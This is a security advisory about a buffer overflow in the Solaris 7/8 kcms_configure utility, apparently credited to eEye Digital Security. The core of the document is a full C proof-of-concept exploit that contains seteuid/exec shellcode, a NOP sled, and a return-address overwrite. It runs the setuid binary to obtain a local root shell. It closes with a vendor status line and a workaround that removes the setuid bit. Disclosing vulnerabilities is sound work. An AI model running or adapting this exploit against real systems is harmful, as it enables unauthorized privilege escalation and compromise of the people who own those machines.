COMMAND

    kcms_configure

SYSTEMS AFFECTED

    Solaris 7/8 (x86 and sparc)

PROBLEM

    eEye Digital Security (Riley Hassell) found following.  They  have
    discovered  a  buffer  overflow  in  the  kcms_configure   utility
    provided with  Solaris 7.   The problem  exists in  the parsing of
    command  line  options.   By  exploiting  this  vulnerability   an
    attacker  can  achieve  local  root  privileges.   The Kodak Color
    Management   System   (KCMS)   packages   have   contained    many
    vulnerabilities in the  past, we recommend  disabling them if  you
    are not currently using them.

    Proof of Concept:

    /*
     Command line argument overflow
     /usr/openwin/bin/kcms_configure
    
     Proof of Concept Exploitation
     Riley Hassell
    */
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    
    #define BUFLEN  1100
    
    /* seteuid/exec shellcode  */
    char shell[] =
    "\xeb\x0a\x9a\x01\x02\x03\x5c\x07\x04\xc3\xeb\x05\xe8\xf9\xff\xff\xff"
    "\x5e\x29\xc0\x88\x46\xf7\x89\x46\xf2\x50\xb0\x8d\xe8\xe0\xff\xff\xff"
    "\x29\xc0\x50\xb0\x17\xe8\xd6\xff\xff\xff\xeb\x1f\x5e\x8d\x1e\x89\x5e"
    "\x0b\x29\xc0\x88\x46\x19\x89\x46\x14\x89\x46\x0f\x89\x46\x07\xb0"
    "\x3b\x8d\x4e\x0b\x51\x51\x53\x50\xeb\x18\xe8\xdc\xff\xff\xff\x2f\x62"
    "\x69\x6e\x2f\x73\x68\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03"
    "\x03\x9a\x04\x04\x04\x04\x07\x04";
    
    char buf[BUFLEN];
    unsigned long int nop, esp;
    long int offset = 0;
    
    unsigned long int get_esp() { __asm__("movl %esp,%eax");}
    
    int main (int argc, char *argv[])
    {
            int i;
            if (argc > 1)
  	    offset = strtol(argv[1], NULL, 0);
            else
                 offset = -300;
                nop = 600;
            esp = get_esp();
            memset(buf, 0x90, BUFLEN);
            memcpy(buf+600, shell, strlen(shell));
            for (i = nop+strlen(shell)+1; i <= BUFLEN-4; i += 4)
            *((int *) &buf[i]) = esp+offset;
             buf[BUFLEN-1] = '\0';
            execl("/usr/openwin/bin/kcms_configure", "eEye", "-o","-S","X",buf,NULL);
            return;
    }

SOLUTION

    Sun Microsystems has been  contacted.  They are  currently working
    on patches  for this  and other  related vulnerabilities  eEye has
    discovered.

    Workaround:

        chmod -s /usr/openwin/bin/kcms_configure

    This will remove the setuid bit from kcms_configure, therefore  if
    someone does  exploit this  vulnerability, they  won’t gain higher
    privileges.